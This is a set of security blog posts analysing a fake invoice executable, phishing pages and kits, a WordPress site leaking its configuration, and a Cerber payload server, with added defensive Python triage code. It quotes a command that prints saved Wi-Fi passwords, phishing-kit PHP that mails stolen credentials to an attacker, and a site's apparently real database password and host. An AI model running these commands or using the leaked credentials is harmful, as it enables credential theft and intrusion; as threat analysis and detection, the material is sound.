Monday, March 20, 2017

Fattura Invoice PDF zip exe that uses eMailExtractor

So I'm still learning at this, but I thought I'd walk through my thought process and see if anybody wanted to explain what I did right or wrong :-) A few days ago there was this link:

hxxp://www[.]coccorullo[.]it/fattura/Fattura_49922pdf.zip

When extracted, you ended up with:

0843d52e1df49221a095fbdd0bc4a2cb Fattura_49922pdf.exe

I believe, per Google Translate, that Fattura = Invoice, so this was likely part of some phishing email masquerading as an invoice.

When I ran strings, I saw text that seemed to indicate a different program called emailExtractor.



When I ran objdump, I saw text that seemed to indicate this file was perhaps originally named eMailExtractor.exe.
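As an added example (not code from the original post), here is a small Python stand-in for strings that also pulls out UTF-16LE strings, which is how a PE file's version resource stores fields like OriginalFilename and why plain ASCII strings output can miss them. The sample bytes, the function names and the name_mismatch heuristic are constructed for illustration and are not taken from the real file.

```python
import re
import sys
from typing import List, Optional

# Constructed sample, not bytes from the real Fattura_49922pdf.exe: a fragment
# shaped like a PE VS_VERSION_INFO resource, where key and value strings are
# UTF-16LE (each ASCII byte followed by 0x00), followed by a plain ASCII name.
SAMPLE = (
    b"\x00\x00" + "OriginalFilename".encode("utf-16-le") + b"\x00\x00"
    + "eMailExtractor.exe".encode("utf-16-le") + b"\x00\x00"
    + b"\x90\x90Fattura_49922pdf.exe\x00"
)


def ascii_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Printable ASCII runs of at least min_len bytes (what strings shows by default)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def utf16le_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Printable UTF-16LE runs (ASCII byte + 0x00 pairs), as in PE version info."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pattern.finditer(data)]


def original_filename(data: bytes) -> Optional[str]:
    """Value stored right after the OriginalFilename key, if the resource has one."""
    wide = utf16le_strings(data)
    for i, s in enumerate(wide):
        if s == "OriginalFilename" and i + 1 < len(wide):
            return wide[i + 1]
    return None


def name_mismatch(on_disk: str, data: bytes) -> bool:
    """True when the embedded OriginalFilename differs from the name on disk:
    a cheap hint that the file was renamed or repackaged before delivery."""
    orig = original_filename(data)
    return orig is not None and orig.lower() != on_disk.lower()


if __name__ == "__main__":
    # Usage: python pe_strings.py <file>; without an argument the constructed sample is used.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for s in ascii_strings(blob) + utf16le_strings(blob):
        print(s)
    print("OriginalFilename:", original_filename(blob))
```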



After a Google search I came up with this site: hxxps://www[.]maxprog[.]com/site/software/internet-marketing/email-extractor_sheet_us.php



So my thoughts were one of:
  a.) This is just the legit software, and VirusTotal is screaming because it's crap ad-loaded junk; or
  b.) perhaps the attacker just renamed it or made it look like legit software in order to throw off security researchers; or
  c.) perhaps something more is going on here, like maybe the attacker modified this eMailExtractor.exe for his evil bidding, and made it so that when the user executes it, it will "collect all emails on his computer" and then send them back to the attacker somehow. An email harvester.

Thoughts?

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Friday, March 3, 2017

netsh for clear text wifi password

I thought this Dmitry Kulshitsky blog post was interesting, and the fact that you can type the following command

netsh wlan show profile name="MyTestWifi" key=clear

And it displays the password in clear text! (under Security settings -> Key Content)
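From the defender's side, the same command is worth alerting on when it shows up in process-creation logs. The following Python check is an added example, not from the original post or from Dmitry Kulshitsky's blog; it assumes Windows Security event 4688 with command-line auditing enabled, and the event records below are constructed.

```python
import re
from typing import Dict, List

# Constructed records modelled on Windows Security event 4688 (process creation)
# with "Include command line in process creation events" enabled; not real logs.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "WS01", "user": "alice", "cmd": 'netsh wlan show profile name="MyTestWifi" key=clear'},
    {"host": "WS01", "user": "alice", "cmd": "netsh wlan show profile"},
    {"host": "WS02", "user": "SYSTEM", "cmd": r"C:\Windows\system32\svchost.exe -k netsvcs"},
    {"host": "WS03", "user": "bob", "cmd": "NETSH  WLAN  SHOW  PROFILES  key=CLEAR"},
    {"host": "WS03", "user": "bob", "cmd": r"C:\Windows\System32\netsh.exe wlan show profile key=clear name=CorpWifi"},
]

# Tolerates mixed case, extra whitespace, a full path to netsh.exe, profile/profiles,
# and key=clear in any position after the subcommand. Listing profiles without
# key=clear is routine admin activity and is deliberately not matched.
WIFI_KEY_DUMP = re.compile(
    r"\bnetsh(?:\.exe)?\s+wlan\s+show\s+profiles?\b.*?\bkey\s*=\s*clear\b",
    re.IGNORECASE,
)


def is_wifi_key_dump(cmd: str) -> bool:
    return WIFI_KEY_DUMP.search(cmd) is not None


def find_wifi_key_dumps(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the events whose command line reveals a saved Wi-Fi key in clear text."""
    return [e for e in events if is_wifi_key_dump(e["cmd"])]


def hosts_by_count(events: List[Dict[str, str]]) -> Dict[str, int]:
    """Per-host tally, useful for spotting one machine dumping many profiles."""
    tally: Dict[str, int] = {}
    for e in find_wifi_key_dumps(events):
        tally[e["host"]] = tally.get(e["host"], 0) + 1
    return tally
```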




Tuesday, February 21, 2017

Customs Banned Goods Adobe Phish

Adobe Phish

From: "CUSTOMS SERVICES"

Attachment: BANNED GOODS.html (MD5 e1e0e1d1720dbcc536c2f596d76627d9, VirusTotal has 19/55)

Body: PLEASE FIND THE ATTACHED LIST OF NEWLY BANNED GOODS BY THE GOVERNMENT

Open the attachment and you see this pretty convincing page (pic below) with a nice background that makes it look like you're in Adobe Reader instead of a browser.

It contains the following ...

alert .... Document is Highly Secured by Microsoft INC. Requires Email Authentication: Kindly Sign in with your correct email and password to view Document
title ... PDF Online
form method ... POST ... action= hxxp://send.akataali[.]us/pdnew.php
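To triage an attachment like this offline instead of opening it, the following Python script (an added example, not the post's own code) pulls out the title, alert text, form targets and password fields that the post lists by hand. The sample HTML is constructed around the strings quoted above, with the form action kept defanged and the input names made up.

```python
import re
from html.parser import HTMLParser
from typing import Dict

# Constructed sample modelled on the attachment described above: title, alert text
# and (defanged) form action are the strings quoted in the post; field names are made up.
SAMPLE_HTML = """<html><head><title>PDF Online</title>
<script>alert('Document is Highly Secured by Microsoft INC. Requires Email Authentication: Kindly Sign in with your correct email and password to view Document');</script>
</head><body style="background:url(adobe_reader_bg.png)">
<form method="POST" action="hxxp://send.akataali[.]us/pdnew.php">
<input type="text" name="email"><input type="password" name="pass">
<input type="submit" value="View Document"></form></body></html>"""


class FormParser(HTMLParser):
    """Collect the <title>, each <form> as (method, action), and password inputs."""
    def __init__(self):
        super().__init__()
        self.title, self._in_title, self.forms, self.password_fields = "", False, [], 0
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "title":
            self._in_title = True
        elif tag == "form":
            self.forms.append((a.get("method", "get").upper(), a.get("action", "")))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_fields += 1
    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
    def handle_data(self, data):
        if self._in_title:
            self.title += data


def triage(html: str) -> Dict[str, object]:
    """Summarise what the page claims to be and where a filled-in form would go."""
    p = FormParser()
    p.feed(html)
    alerts = [m.group(2) for m in re.finditer(r"alert\(\s*(['\"])(.*?)\1\s*\)", html, re.S)]
    # Hosts are pulled with a regex so defanged URLs (hxxp, [.]) work without refanging.
    hosts = sorted({m.group(1) for _, act in p.forms for m in [re.match(r"^\w+://([^/]+)", act)] if m})
    return {
        "title": p.title.strip(),
        "alerts": alerts,
        "forms": p.forms,
        "post_hosts": hosts,
        # The tell: a "document viewer" page that POSTs a password to another host.
        "credential_phish": p.password_fields > 0 and bool(hosts)
        and any(m == "POST" for m, _ in p.forms),
    }
```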





Saturday, February 18, 2017

Phishing Site with Search Engine Detection

Continuing the discussion of @Techhelplistcom's post about a DHL/Stripe phish site

hxxp://bitadze[.]ge/wp-includes/

The http.zip file also contained X-x-X.php, which appears to be search engine/bot/crawler detection: in theory it returns 404 Not Found for search engines trying to index the site and 200 Success for the victims. The idea is probably that they don't want their pages to show up in search engines; they want them hidden from the internet except for when they send out their links in phishing emails. That probably extends the lifetime, and thus the success rate, of their phishing campaign.

Full code here






Attacker Emailed himself your Phished Credentials

@Techhelplistcom posted a DHL/Stripe phish site

hxxp://bitadze[.]ge/wp-includes/

The site was still wide open, so you could view the http.zip file and in particular, under the Stripe phish, the tfo.php file, which is a good example of visibility behind the scenes: you can see what an attacker is doing with your phished credentials after you enter your data and click submit on their malicious site.



As you can see, the attacker grabs your IP address

$ip = $_SERVER['REMOTE_ADDR'];

What browser you're using

$useragent = $_SERVER['HTTP_USER_AGENT'];

Your email & password

$message .= "EMAIL : ".$_POST['1KDL23']."\n";
$message .= "PASSWORD : ".$_POST['FZ32FEZ2345']."\n";


and sends it to himself

$send="fastpay147@gmail.com";


Wordpress Config as homepage

@wavellan posted a spam and phishing URL.

hxxp://enerjietudu[.]com/

Interestingly, if you browse to the homepage you get the wp-config.php file returned.



Full contents here

And like every good wp-config.php file, it contains information such as

define('DB_NAME', 'enerjik3460');
define('DB_USER', 'enerjik34');
define('DB_PASSWORD', 'energy34');
define('DB_HOST', '94.73.144.196');


And all the encryption deets (the authentication keys and salts)

define('AUTH_KEY', ...
define('SECURE_AUTH_KEY',
define('LOGGED_IN_KEY',
define('NONCE_KEY',
define('AUTH_SALT',
define('SECURE_AUTH_SALT',
define('LOGGED_IN_SALT',
define('NONCE_SALT', ...


All the comments are in Turkish per google translate.

The bottom has an error showing the full path we are sitting in:

Fatal error: Call to undefined function wp() in /home/enerjietudu.com/httpdocs/wp-blog-header.php on line 22

I notice that no matter which page I go to (wp-admin/admin.php, etc.), the wp-config.php contents are shown and an error is thrown.
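A quick way to check your own WordPress site for this symptom is to scan the response body for printed wp-config.php constants and for a PHP fatal error that exposes the install path. The following Python check is an added example, not from the original post; the response body is constructed with placeholder values rather than the live site's credentials.

```python
import re
from typing import Dict

# Constructed response body mimicking the symptom described above: wp-config.php
# constants printed ahead of the HTML, then the PHP fatal error that leaks the
# install path. Values are placeholders, not the credentials from the live site.
SAMPLE_BODY = """define('DB_NAME', 'example_db');
define('DB_USER', 'example_user');
define('DB_PASSWORD', 'example-password');
define('DB_HOST', '192.0.2.10');
define('AUTH_KEY', 'EXAMPLE-KEY-VALUE');
define('NONCE_SALT', 'EXAMPLE-SALT-VALUE');
<br />
<b>Fatal error</b>:  Call to undefined function wp() in <b>/home/example.com/httpdocs/wp-blog-header.php</b> on line <b>22</b><br />
"""

# Constants whose exposure hands over the database or lets login cookies be forged.
SENSITIVE = {"DB_NAME", "DB_USER", "DB_PASSWORD", "DB_HOST",
             "AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
             "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT"}
DEFINE_RE = re.compile(r"define\(\s*['\"]([A-Z_]+)['\"]\s*,")
FATAL_RE = re.compile(r"Fatal error:\s*(.*?) in (\S+) on line (\d+)")


def check_wpconfig_leak(body: str) -> Dict[str, object]:
    """Report which wp-config constants and which server path a page leaks.
    Only constant names are returned, never their values, so the report is safe to log."""
    text = re.sub(r"<[^>]+>", "", body)  # works on raw or HTML-wrapped PHP output
    leaked = [n for n in DEFINE_RE.findall(text) if n in SENSITIVE]
    fatal = FATAL_RE.search(text)
    return {
        "leaked_constants": leaked,
        "db_credentials_exposed": {"DB_USER", "DB_PASSWORD"} <= set(leaked),
        "auth_keys_exposed": any(n.endswith(("_KEY", "_SALT")) for n in leaked),
        "server_path": fatal.group(2) if fatal else None,
        "error_line": int(fatal.group(3)) if fatal else None,
        "leak": bool(leaked) or fatal is not None,
    }
```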

If I had to guess, I think somebody hacked this WordPress site by finding a vulnerability in the WordPress blog header: they found some vulnerability that outputs the content of a file, and so of course they chose the wp-config.php file, and now it's being displayed in the header of every page you navigate to. Then they used that output to log in and take control of the database, and then were able to use the database to write files to the www root folder and use it in phishing campaigns.

I don't claim to know everything, I'm just guessing. Anybody want to explain what really happened? Thanks!


Thursday, February 16, 2017

Cerber payload generator with different hashes

@MlwrHpstr posted a Cerber URL

freeflamec[.]top/read.php?f=1.gif

If you go directly to the link it'll download a file.



If you run md5sum on the file you'll get a hash:



c27b380afa8e88d2eba7c58a97d31be1

If you search that MD5 on VirusTotal, it shows you some interesting details about it.





If you run strings you'll see this is no PHP file and no .gif file: this is a Windows executable.
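The file-type check can be automated: a download's real type comes from its leading bytes, not from its name or the URL's .gif extension. The following Python triage is an added example, not the post's own code; the sample bytes are constructed (a minimal MZ/PE header and a minimal GIF header) rather than the real Cerber download, and the type table and field names are my own.

```python
import hashlib
from typing import Dict, Tuple

# Constructed samples, not the real download: a minimal DOS/PE header whose
# e_lfanew (offset 0x3C) points at a "PE\0\0" signature, and a minimal GIF header.
FAKE_GIF_THAT_IS_EXE = (b"MZ\x90\x00" + b"\x00" * 56 + (0x80).to_bytes(4, "little")
                        + b"\x00" * 64 + b"PE\x00\x00" + b"\x00" * 100)
REAL_GIF = b"GIF89a\x01\x00\x01\x00" + b"\x00" * 20

# Leading-byte signatures for the types this post mentions (PHP, GIF, PE) plus PDF and ZIP.
SIGNATURES = [
    (b"MZ", "application/x-dosexec"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"<?php", "text/x-php"),
    (b"%PDF-", "application/pdf"),
    (b"PK\x03\x04", "application/zip"),
]
EXT_TYPES = {"exe": "application/x-dosexec", "dll": "application/x-dosexec",
             "gif": "image/gif", "php": "text/x-php", "pdf": "application/pdf",
             "zip": "application/zip"}


def sniff(data: bytes) -> Tuple[str, bool]:
    """Return (type from magic bytes, is_pe). MZ alone is only a DOS header; the
    file counts as a PE when e_lfanew points at the 'PE\\0\\0' signature."""
    kind = next((t for magic, t in SIGNATURES if data.startswith(magic)), "unknown")
    is_pe = False
    if kind == "application/x-dosexec" and len(data) >= 0x40:
        off = int.from_bytes(data[0x3C:0x40], "little")
        is_pe = data[off:off + 4] == b"PE\x00\x00"
    return kind, is_pe


def triage_download(name: str, data: bytes) -> Dict[str, object]:
    """Hash the file and compare what the name claims with what the bytes say."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    kind, is_pe = sniff(data)
    claimed = EXT_TYPES.get(ext)
    return {
        "name": name,
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "detected": kind,
        "is_pe": is_pe,
        "extension_mismatch": claimed is not None and claimed != kind,
        # A PE delivered under a non-executable name is the red flag in this post.
        "hidden_executable": is_pe and ext not in ("exe", "dll", "sys", "scr"),
    }
```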



Something else interesting is that this web server's read.php script is set up to only serve certain parameter values. If you try to pass in something like 2.gif instead of 1.gif you get an HTTP 200 but no file.



If you try to leave the f parameter empty, you actually get a file, but it's 0 bytes (empty).



Thus I would venture to guess there are other parameter values you could pass that may serve up different payloads.

Also, if you go to the root of the site they have it redirecting to godaddy.com, so this is not a compromised site; it's simply a site set up for malicious purposes, to serve certain hidden payloads.



If you type in any random PHP page name that doesn't exist, you'll be able to tell the web server version it's running (Apache/2.2.15 (CentOS) Server).



Poking around, I found another page that works (admin.php instead of read.php).



It delivers a different payload with a different hash (6ab4bfd0fa555fc570188af13409a669), which gives different VirusTotal hits, another EXE.





Actually it's interesting: this PHP file generates random Cerber EXEs with different hashes every time you reload it.



A good example of why signature-based tools like AV are dying: stuff like this is probably the exact same payload, just slightly modified so that the hash changes every time.
